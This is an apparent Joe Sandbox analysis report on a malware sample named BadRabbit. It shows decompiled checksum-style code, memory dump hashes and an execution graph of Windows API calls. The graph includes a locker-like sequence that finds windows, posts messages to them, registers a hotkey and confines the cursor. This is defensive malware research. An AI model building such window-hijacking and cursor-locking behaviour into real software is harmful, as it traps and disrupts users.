_t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t229 >> 0x18) * 4) ^  *(0xd5718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t229 >> 0x18) * 4) ^  *(0xd5718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t171 >> 0x18) * 4) ^  *(0xd5718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t235 >> 0x18) * 4) ^  *(0xd5718 + (_t235 & 0x000000ff) * 4) ^ _t250[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + (( *(0xd4f18 + (( *(0xd4f18 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t229 >> 0x18) * 4) ^  *(0xd5718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t229 >> 0x18) * 4) ^  *(0xd5718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t171 >> 0x18) * 4) ^  *(0xd5718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + (( *(0xd4f18 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t229 >> 0x18) * 4) ^  *(0xd5718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t229 >> 0x18) * 4) ^  *(0xd5718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t171 >> 0x18) * 4) ^  *(0xd5718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t235 >> 0x18) * 4) ^  *(0xd5718 + (_t235 & 0x000000ff) * 4) ^ _t250[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t177 >> 0x18) * 4) ^  *(0xd5718 + (_t177 & 0x000000ff) * 4) ^ _t250[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (_t241 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t241 >> 0x18) * 4) ^  *(0xd5718 + (_t241 & 0x000000ff) * 4) ^ _t250[5]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t183 >> 0x18) * 4) ^  *(0xd5718 + (_t183 & 0x000000ff) * 4) ^ _t250[6]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (_t247 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t247 >> 0x18) * 4) ^  *(0xd5718 + (_t247 & 0x000000ff) * 4);
                                                                                                                                                  						_t84 =  &_a4;
                                                                                                                                                  						 *_t84 = _a4 - 1;
                                                                                                                                                  						if( *_t84 == 0) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						_t189 = _a8;
                                                                                                                                                  						_t222 = 0xff;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				if(_t248 >= 4) {
                                                                                                                                                  					_t224 = _t248 >> 2;
                                                                                                                                                  					do {
                                                                                                                                                  						_t164 = _t161 ^  *_t249;
                                                                                                                                                  						_t248 = _t248 - 4;
                                                                                                                                                  						_t249 =  &(_t249[4]);
                                                                                                                                                  						_t161 =  *(0xd4f18 + (_t164 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (_t164 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t164 >> 0x18) * 4) ^  *(0xd5718 + (_t164 & 0x000000ff) * 4);
                                                                                                                                                  						_t224 = _t224 - 1;
                                                                                                                                                  					} while (_t224 != 0);
                                                                                                                                                  				}
                                                                                                                                                  				if(_t248 != 0) {
                                                                                                                                                  					do {
                                                                                                                                                  						_t161 = _t161 >> 0x00000008 ^  *(0xd4b18 + (( *_t249 & 0x000000ff ^ _t161) & 0x000000ff) * 4);
                                                                                                                                                  						_t249 =  &(_t249[1]);
                                                                                                                                                  						_t248 = _t248 - 1;
                                                                                                                                                  					} while (_t248 != 0);
                                                                                                                                                  				}
                                                                                                                                                  				return  !_t161;
                                                                                                                                                  			}












                                                                                                                                                  0x000d30e6
                                                                                                                                                  0x000d30e9
                                                                                                                                                  0x000d30f4
                                                                                                                                                  0x000d30f7
                                                                                                                                                  0x000d30f9
                                                                                                                                                  0x000d30fb
                                                                                                                                                  0x000d30fb
                                                                                                                                                  0x000d30fe
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3100
                                                                                                                                                  0x000d3103
                                                                                                                                                  0x000d310f
                                                                                                                                                  0x000d3116
                                                                                                                                                  0x000d3117
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3117
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3103
                                                                                                                                                  0x000d311d
                                                                                                                                                  0x000d331b
                                                                                                                                                  0x000d3123
                                                                                                                                                  0x000d3128
                                                                                                                                                  0x000d3135
                                                                                                                                                  0x000d3135
                                                                                                                                                  0x000d313a
                                                                                                                                                  0x000d3146
                                                                                                                                                  0x000d325e
                                                                                                                                                  0x000d326d
                                                                                                                                                  0x000d32d5
                                                                                                                                                  0x000d32d8
                                                                                                                                                  0x000d32dd
                                                                                                                                                  0x000d3309
                                                                                                                                                  0x000d3310
                                                                                                                                                  0x000d3310
                                                                                                                                                  0x000d3313
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d312d
                                                                                                                                                  0x000d3130
                                                                                                                                                  0x000d3130
                                                                                                                                                  0x000d3319
                                                                                                                                                  0x000d3321
                                                                                                                                                  0x000d3325
                                                                                                                                                  0x000d3328
                                                                                                                                                  0x000d3328
                                                                                                                                                  0x000d332a
                                                                                                                                                  0x000d3334
                                                                                                                                                  0x000d3369
                                                                                                                                                  0x000d336b
                                                                                                                                                  0x000d336b
                                                                                                                                                  0x000d3328
                                                                                                                                                  0x000d3370
                                                                                                                                                  0x000d3372
                                                                                                                                                  0x000d337f
                                                                                                                                                  0x000d3386
                                                                                                                                                  0x000d3387
                                                                                                                                                  0x000d3387
                                                                                                                                                  0x000d3372
                                                                                                                                                  0x000d3392

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.303040427.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                  • Associated: 00000009.00000002.303032103.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 00000009.00000002.303059119.00000000000D4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 00000009.00000002.303073243.00000000000D9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_d0000_Endermanch@BadRabbit.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b4e2dbdd4a8cb4b77ca83e9749b51406a738c554d516366ec1f529e474d61fd2
                                                                                                                                                  • Instruction ID: 64a2564b933fcc117751eeae5c8e006090539b933edeb7eec44cdf3e2eccde10
                                                                                                                                                  • Opcode Fuzzy Hash: b4e2dbdd4a8cb4b77ca83e9749b51406a738c554d516366ec1f529e474d61fd2
                                                                                                                                                  • Instruction Fuzzy Hash: 62719135721B419BE718CF1EECD092A73A2F79930174A853ADE4587391C639EA22C6F0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:10.4%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:15.7%
                                                                                                                                                  Signature Coverage:3.3%
                                                                                                                                                  Total number of Nodes:1137
                                                                                                                                                  Total number of Limit Nodes:21
                                                                                                                                                  execution_graph 12846 406520 12892 403a44 12846->12892 12848 40657f 12896 4083e0 12848->12896 12849 4066bf 12860 40671e 12849->12860 12960 407a18 12849->12960 12853 406586 12901 407fd0 12853->12901 12858 40669d 12863 4079f0 5 API calls 12858->12863 12968 4039ac 12860->12968 12866 4066a6 12863->12866 12865 4066fc 12869 407a18 5 API calls 12865->12869 12866->12849 12872 4079fc 7 API calls 12866->12872 12871 406705 12869->12871 12871->12860 12875 407a24 7 API calls 12871->12875 12872->12849 12875->12860 12878 4065fc 12940 406b4c 12878->12940 12880 406616 12883 406e28 13 API calls 12880->12883 12882 407fd0 51 API calls 12884 406609 12882->12884 12885 40663b DrawTextA 12883->12885 12948 406e28 12884->12948 12887 406648 12885->12887 12888 406659 12885->12888 12889 407fd0 51 API calls 12887->12889 12888->12849 12952 4079f0 12888->12952 12891 406650 SelectObject 12889->12891 12891->12888 12893 403a48 12892->12893 12894 403a6c 12893->12894 12972 402658 12893->12972 12894->12848 12894->12888 12913 403c50 12894->12913 12897 4083e5 12896->12897 12898 4083e7 12896->12898 12897->12853 12899 4083f7 12898->12899 13016 4076a4 12898->13016 12899->12853 13023 408410 12901->13023 12903 407fd9 12909 406591 12903->12909 13050 4060b0 12903->13050 12907 408010 12908 406a20 DeleteObject 12907->12908 12907->12909 12908->12909 12910 406dfc 12909->12910 13258 4081c0 12910->13258 12912 40659c 12912->12888 12927 4077ec 12912->12927 12914 403c93 12913->12914 12915 403c54 12913->12915 12914->12848 12916 403a00 12915->12916 12917 403c5e 12915->12917 12923 403a14 12916->12923 12924 403a70 25 API calls 12916->12924 12918 403c71 12917->12918 12919 403c88 12917->12919 12920 403f68 25 API calls 12918->12920 12922 403f68 25 API calls 12919->12922 12926 403c76 12920->12926 12921 403a42 12921->12848 12922->12926 12923->12921 12925 402658 11 API calls 12923->12925 12924->12923 12925->12921 12926->12848 12928 4077ff 12927->12928 12929 4083e0 2 API calls 12928->12929 12930 407806 12929->12930 12931 4065bf 12930->12931 12932 407809 GetClientRect 12930->12932 12931->12880 12933 407d04 12931->12933 12932->12931 12934 407d38 12933->12934 12935 407d0d 12933->12935 12934->12878 13262 4069d0 12935->13262 12937 407d13 13265 406828 12937->13265 12939 407d1c 12939->12878 12943 406b4d 12940->12943 12941 406a10 GetSysColor 12941->12943 12942 406601 12942->12882 12943->12941 12943->12942 12944 406b8f 12943->12944 13275 406ab8 12943->13275 12945 406a10 GetSysColor 12944->12945 12945->12942 12949 406e34 12948->12949 12950 40660e SelectObject 12948->12950 12951 406d5c 13 API calls 12949->12951 12950->12880 12951->12950 13278 407744 12952->13278 12955 4079fc 12956 407744 5 API calls 12955->12956 12957 407a02 12956->12957 13291 407754 12957->13291 12961 407744 5 API calls 12960->12961 12962 4066e5 12961->12962 12962->12865 12963 407a24 12962->12963 12964 407744 5 API calls 12963->12964 12965 407a2a 12964->12965 12966 407754 7 API calls 12965->12966 12967 407a3d 12966->12967 12967->12865 12969 4039cd 12968->12969 12970 4039b2 12968->12970 12970->12969 12971 402658 11 API calls 12970->12971 12971->12969 12973 40265d 12972->12973 12974 402670 12972->12974 12973->12974 12976 402720 12973->12976 12974->12894 12977 4026d4 12976->12977 12978 4026f9 12977->12978 12982 405580 12977->12982 12990 4026c8 12978->12990 12983 4055b5 TlsGetValue 12982->12983 12984 40558f 12982->12984 12985 40559a 12983->12985 12986 4055bf 12983->12986 12984->12978 12993 40553c 12985->12993 12986->12978 12988 40559f TlsGetValue 12989 4055ae 12988->12989 12989->12978 13000 403994 12990->13000 12995 405542 12993->12995 12994 405566 12994->12988 12995->12994 12999 405528 LocalAlloc 12995->12999 12997 405562 12997->12994 12998 405572 TlsSetValue 12997->12998 12998->12994 12999->12997 13003 4038bc 13000->13003 13004 4038d5 13003->13004 13006 4038fe 13004->13006 13010 403830 13004->13010 13007 403940 FreeLibrary 13006->13007 13008 403964 ExitProcess 13006->13008 13007->13006 13011 403891 13010->13011 13014 40383a GetStdHandle WriteFile GetStdHandle WriteFile 13010->13014 13012 40389a MessageBoxA 13011->13012 13013 4038ad 13011->13013 13012->13013 13013->13006 13014->13006 13017 4076ac 13016->13017 13018 4076c9 13017->13018 13019 4076b8 ShowWindow 13017->13019 13020 4076ca ShowWindow 13017->13020 13018->12899 13019->13018 13022 4076dd 13020->13022 13022->12899 13024 40841d 13023->13024 13025 408417 13023->13025 13027 40844b LoadCursorA 13024->13027 13030 40843c 13024->13030 13031 408426 13024->13031 13026 4083e0 2 API calls 13025->13026 13026->13024 13062 4086a4 13027->13062 13029 40847b 13066 405be0 13029->13066 13030->12903 13031->13030 13032 4076a4 2 API calls 13031->13032 13032->13030 13037 4084fa GetClassInfoA 13038 40851e 13037->13038 13039 40853f GetClassInfoA 13038->13039 13040 4085f8 13038->13040 13041 40855c RegisterClassA 13039->13041 13042 40857d CreateWindowExA 13039->13042 13040->12903 13041->13040 13041->13042 13042->13040 13043 40858f SendMessageA GetWindowLongA 13042->13043 13044 4085be 13043->13044 13045 4085af SetWindowLongA 13043->13045 13049 4085d9 13044->13049 13073 40784c 13044->13073 13045->13044 13049->13040 13189 4067f8 13050->13189 13053 4060d7 13053->12909 13055 406a20 13053->13055 13056 406a24 13055->13056 13058 406a2c 13055->13058 13056->12907 13057 406a65 13057->12907 13058->13057 13254 406a6c 13058->13254 13060 406a4e 13061 406a6c DeleteObject 13060->13061 13061->13057 13063 4086b3 13062->13063 13064 4086c6 13063->13064 13082 403c94 13063->13082 13064->13029 13067 4039ac 11 API calls 13066->13067 13068 405bec 13067->13068 13069 407aa8 13068->13069 13070 407abf 13069->13070 13071 407ab6 13069->13071 13070->13037 13070->13038 13071->13070 13072 4083e0 2 API calls 13071->13072 13072->13070 13074 407857 13073->13074 13075 407898 13073->13075 13074->13075 13076 407888 LoadIconA 13074->13076 13077 407866 13074->13077 13079 40802c 13075->13079 13076->13075 13077->13075 13078 407870 CopyImage 13077->13078 13078->13075 13080 4083e0 2 API calls 13079->13080 13081 408040 SendMessageA 13080->13081 13081->13049 13083 403c98 13082->13083 13089 403c50 13082->13089 13084 403a00 13083->13084 13086 403cb6 13083->13086 13087 403ca8 13083->13087 13083->13089 13094 403a14 13084->13094 13104 403a70 13084->13104 13085 403a42 13085->13064 13091 403a70 25 API calls 13086->13091 13115 403a00 13087->13115 13088 403c93 13088->13064 13089->13084 13089->13088 13093 403c5e 13089->13093 13100 403cc9 13091->13100 13095 403c71 13093->13095 13096 403c88 13093->13096 13094->13085 13097 402658 11 API calls 13094->13097 13109 403f68 13095->13109 13099 403f68 25 API calls 13096->13099 13097->13085 13102 403c76 13099->13102 13101 403a00 25 API calls 13100->13101 13103 403cf5 13101->13103 13102->13064 13103->13064 13105 403a74 13104->13105 13106 403a98 13104->13106 13121 402638 13105->13121 13106->13094 13111 403f75 13109->13111 13114 403fa5 13109->13114 13110 4039ac 11 API calls 13113 403f81 13110->13113 13112 403a70 25 API calls 13111->13112 13111->13113 13112->13114 13113->13102 13114->13110 13116 403a04 13115->13116 13117 403a14 13115->13117 13116->13117 13119 403a70 25 API calls 13116->13119 13118 403a42 13117->13118 13120 402658 11 API calls 13117->13120 13118->13089 13119->13117 13120->13118 13122 402650 13121->13122 13123 40263d 13121->13123 13122->13094 13127 402064 13123->13127 13124 402643 13124->13122 13125 402720 11 API calls 13124->13125 13125->13122 13128 40207d 13127->13128 13129 402078 13127->13129 13131 4020aa RtlEnterCriticalSection 13128->13131 13132 4020b4 13128->13132 13135 402089 13128->13135 13138 401978 RtlInitializeCriticalSection 13129->13138 13131->13132 13132->13135 13145 401f70 13132->13145 13135->13124 13136 4021d5 RtlLeaveCriticalSection 13137 4021df 13136->13137 13137->13124 13139 40199c RtlEnterCriticalSection 13138->13139 13140 4019a6 13138->13140 13139->13140 13141 4019c4 LocalAlloc 13140->13141 13142 4019de 13141->13142 13143 401a23 RtlLeaveCriticalSection 13142->13143 13144 401a2d 13142->13144 13143->13144 13144->13128 13148 401f80 13145->13148 13146 401fac 13150 401fd0 13146->13150 13156 401d84 13146->13156 13148->13146 13148->13150 13151 401ee4 13148->13151 13150->13136 13150->13137 13160 401738 13151->13160 13153 401ef4 13155 401f01 13153->13155 13169 401e58 13153->13169 13155->13148 13157 401dd9 13156->13157 13158 401da2 13156->13158 13157->13158 13176 401cd4 13157->13176 13158->13150 13163 401754 13160->13163 13161 40175e 13164 401624 VirtualAlloc 13161->13164 13162 401490 LocalAlloc VirtualAlloc VirtualFree 13162->13163 13163->13161 13163->13162 13165 40176a 13163->13165 13166 40138c LocalAlloc 13163->13166 13167 4017af 13163->13167 13164->13165 13165->13153 13166->13163 13168 40156c VirtualFree 13167->13168 13168->13165 13170 401e0c 9 API calls 13169->13170 13171 401e6c 13170->13171 13172 40138c LocalAlloc 13171->13172 13173 401e7c 13172->13173 13174 401bb0 9 API calls 13173->13174 13175 401e84 13173->13175 13174->13175 13175->13155 13178 401cea 13176->13178 13177 401d72 13177->13158 13178->13177 13179 401d15 13178->13179 13180 401d29 13178->13180 13181 4018ec LocalAlloc VirtualFree VirtualFree 13179->13181 13182 4018ec LocalAlloc VirtualFree VirtualFree 13180->13182 13183 401d27 13181->13183 13182->13183 13183->13177 13184 401bb0 9 API calls 13183->13184 13185 401d4d 13184->13185 13186 401d67 13185->13186 13187 401c04 9 API calls 13185->13187 13188 4013fc LocalAlloc 13186->13188 13187->13186 13188->13177 13200 402d00 13189->13200 13191 4060c1 13191->13053 13192 406d5c 13191->13192 13193 406dc1 13192->13193 13194 406d69 13192->13194 13193->13053 13196 406da0 13194->13196 13197 406d93 13194->13197 13198 406d88 ReleaseDC 13194->13198 13196->13193 13206 406dc4 13196->13206 13197->13196 13199 406d9a DeleteDC 13197->13199 13198->13196 13199->13196 13201 402d05 13200->13201 13202 402d06 13200->13202 13201->13191 13203 402d47 13202->13203 13204 402638 25 API calls 13202->13204 13203->13191 13205 402d18 13204->13205 13205->13191 13209 406de8 13206->13209 13208 406dd4 13208->13193 13212 406cec 13209->13212 13213 406cfe 13212->13213 13214 406e28 13 API calls 13213->13214 13215 406d10 13213->13215 13214->13215 13216 406d29 13215->13216 13219 406d50 MoveToEx 13215->13219 13222 406c0c 13215->13222 13218 406d35 13216->13218 13235 406c5c 13216->13235 13218->13219 13242 406ba4 13218->13242 13219->13208 13223 406c44 13222->13223 13224 406c14 13222->13224 13225 406c42 13223->13225 13227 406a10 GetSysColor 13223->13227 13251 406a10 13224->13251 13225->13216 13229 406c57 13227->13229 13231 406c3c SetTextColor 13229->13231 13230 406b4c 3 API calls 13232 406c25 13230->13232 13231->13225 13233 406e28 11 API calls 13232->13233 13234 406c34 SelectObject 13233->13234 13234->13231 13236 406c91 13235->13236 13237 406c61 13235->13237 13236->13218 13238 406b4c 3 API calls 13237->13238 13239 406c73 13238->13239 13240 406e28 11 API calls 13239->13240 13241 406c82 SelectObject SetROP2 13240->13241 13241->13236 13243 406bac 13242->13243 13248 406bd2 13242->13248 13245 406b4c 3 API calls 13243->13245 13244 406bf8 13244->13219 13246 406bb3 13245->13246 13247 406e28 10 API calls 13246->13247 13250 406bc2 SelectObject 13247->13250 13248->13244 13249 406bee SetBkColor SetBkMode 13248->13249 13249->13244 13250->13248 13252 406a16 GetSysColor 13251->13252 13253 406a1f 13251->13253 13252->13253 13253->13230 13255 406a80 13254->13255 13256 406a73 13254->13256 13255->13060 13257 406a7a DeleteObject 13256->13257 13259 4081c7 13258->13259 13260 406cec 13 API calls 13259->13260 13261 4081db GetTextExtentPoint32A 13260->13261 13261->12912 13269 405f08 13262->13269 13264 4069e0 13264->12937 13266 406832 13265->13266 13268 406837 13265->13268 13272 405d04 13266->13272 13268->12939 13270 4067f8 25 API calls 13269->13270 13271 405f15 13270->13271 13271->13264 13273 4067f8 25 API calls 13272->13273 13274 405d11 13273->13274 13274->13268 13276 406a6c DeleteObject 13275->13276 13277 406abe DeleteObject 13276->13277 13277->12943 13281 4076ec 13278->13281 13282 407702 GetWindowRect 13281->13282 13283 406686 13281->13283 13282->13283 13284 40770f 13282->13284 13283->12858 13283->12955 13288 406130 13284->13288 13287 40771a ClientToScreen OffsetRect 13287->13283 13289 407aa8 2 API calls 13288->13289 13290 406137 13289->13290 13290->13283 13290->13287 13292 407744 5 API calls 13291->13292 13293 40775f 13292->13293 13294 4077ca 13293->13294 13295 4077bc 13293->13295 13296 40779e SetWindowPos 13293->13296 13294->12858 13295->13294 13298 407838 13295->13298 13296->13295 13299 40784a 13298->13299 13300 40783d InvalidateRect 13298->13300 13299->13294 13300->13299 13301 408062 13306 408088 13301->13306 13303 40806c 13316 406818 13303->13316 13305 408072 13307 4080ef 13306->13307 13308 40808f 13306->13308 13307->13303 13309 408096 13308->13309 13310 4080d9 13308->13310 13312 4080ad 13309->13312 13320 406ebc 13309->13320 13310->13307 13311 4080e0 KillTimer 13310->13311 13311->13307 13314 4083e0 2 API calls 13312->13314 13315 4080ce SetTimer 13314->13315 13315->13303 13317 40681e 13316->13317 13318 402658 11 API calls 13317->13318 13319 406826 13318->13319 13319->13305 13339 406eac 13320->13339 13323 406eeb 13325 406828 25 API calls 13323->13325 13326 406f16 13325->13326 13327 406f96 13326->13327 13328 406a20 DeleteObject 13326->13328 13327->13312 13329 406f3c 13328->13329 13330 406f64 13329->13330 13345 407d3c 13329->13345 13332 406a20 DeleteObject 13330->13332 13334 406f6e 13332->13334 13334->13327 13349 407d54 13334->13349 13335 406828 25 API calls 13335->13330 13338 406828 25 API calls 13338->13327 13354 407994 13339->13354 13342 406e68 13357 4060e0 13342->13357 13346 407d4c 13345->13346 13347 407838 InvalidateRect 13346->13347 13348 406f57 13347->13348 13348->13335 13350 407d64 DeleteObject 13349->13350 13351 407d6c 13349->13351 13350->13351 13352 407838 InvalidateRect 13351->13352 13353 406f89 13352->13353 13353->13338 13355 402d00 25 API calls 13354->13355 13356 406ebb 13355->13356 13356->13323 13356->13342 13358 4067f8 25 API calls 13357->13358 13359 4060ed 13358->13359 13359->13323 13360 40732c 13361 40733c 13360->13361 13362 4073a6 13361->13362 13368 40737c 13361->13368 13364 4073bb SetWindowLongA 13362->13364 13365 4073ed 13362->13365 13388 4073ac 13362->13388 13363 407393 PostQuitMessage 13363->13388 13373 4073fc 13364->13373 13366 4073f3 13365->13366 13367 40740a 13365->13367 13389 4078a0 13366->13389 13371 407410 13367->13371 13372 407459 13367->13372 13368->13363 13368->13388 13369 4078a0 2 API calls 13369->13373 13385 40743a PostMessageA 13371->13385 13371->13388 13374 407488 13372->13374 13375 40745f 13372->13375 13376 407495 SendMessageA 13374->13376 13377 4074ad 13374->13377 13392 4078c0 13375->13392 13376->13373 13380 4074b3 GetWindowLongA 13377->13380 13381 4074dd 13377->13381 13382 4074c5 SendMessageA 13380->13382 13380->13388 13383 4074ee GetFocus 13381->13383 13381->13388 13382->13373 13383->13373 13387 4074fc 13383->13387 13384 4078a0 2 API calls 13384->13373 13385->13373 13386 40751b GetKeyState GetKeyState 13386->13388 13387->13373 13387->13386 13388->13369 13388->13373 13390 4078b8 NtdllDefWindowProc_A 13389->13390 13391 4078ae CallWindowProcA 13389->13391 13390->13373 13391->13373 13397 4078e4 13392->13397 13394 4078c8 13395 407466 13394->13395 13396 4078cc SetFocus 13394->13396 13395->13373 13395->13384 13396->13395 13398 4078f0 13397->13398 13399 4078e9 IsWindowEnabled 13397->13399 13398->13394 13399->13394 13400 416fdd 13401 416fe3 13400->13401 13404 416f28 FindWindowA 13401->13404 13405 416f44 FindWindowA 13404->13405 13406 416f38 PostMessageA 13404->13406 13408 416f60 FindWindowA 13405->13408 13409 416f54 PostMessageA 13405->13409 13406->13405 13411 416f70 PostMessageA 13408->13411 13412 416f7c FindWindowA 13408->13412 13409->13408 13411->13412 13414 416f8a 13412->13414 13415 416f98 FindWindowA RegisterHotKey GetWindowRect ClipCursor 13414->13415 13416 416f8c PostMessageA 13414->13416 13416->13415 13417 4171ac 13418 417202 13417->13418 13427 4055cc GetModuleHandleA 13418->13427 13425 4038bc 7 API calls 13426 41727c 13425->13426 13428 4055ff 13427->13428 13607 403718 13428->13607 13431 415e7c 13432 4067f8 25 API calls 13431->13432 13433 415e90 13432->13433 13659 406fb4 13433->13659 13438 406828 25 API calls 13439 415ec7 13438->13439 13669 406298 13439->13669 13445 415ef3 13696 407a44 13445->13696 13449 415f14 13712 406450 13449->13712 13452 406828 25 API calls 13453 415f31 13452->13453 13454 406450 25 API calls 13453->13454 13455 415f4c 13454->13455 13456 406828 25 API calls 13455->13456 13457 415f5f 13456->13457 13715 4082e0 13457->13715 13460 406780 7 API calls 13461 415f8e 13460->13461 13462 407d04 25 API calls 13461->13462 13463 415fa3 13462->13463 13720 405f18 13463->13720 13466 407d04 25 API calls 13467 415fb7 13466->13467 13725 406afc 13467->13725 13470 407d04 25 API calls 13471 415fcc 13470->13471 13729 40819c 13471->13729 13474 407a44 7 API calls 13475 415fe5 13474->13475 13733 408398 13475->13733 13478 406780 7 API calls 13479 415ffa 13478->13479 13736 407b6c 13479->13736 13481 416009 13482 407a44 7 API calls 13481->13482 13483 416023 13482->13483 13484 4082e0 29 API calls 13483->13484 13485 416032 13484->13485 13486 406780 7 API calls 13485->13486 13487 416041 13486->13487 13488 407d04 25 API calls 13487->13488 13489 416060 13488->13489 13490 405f18 2 API 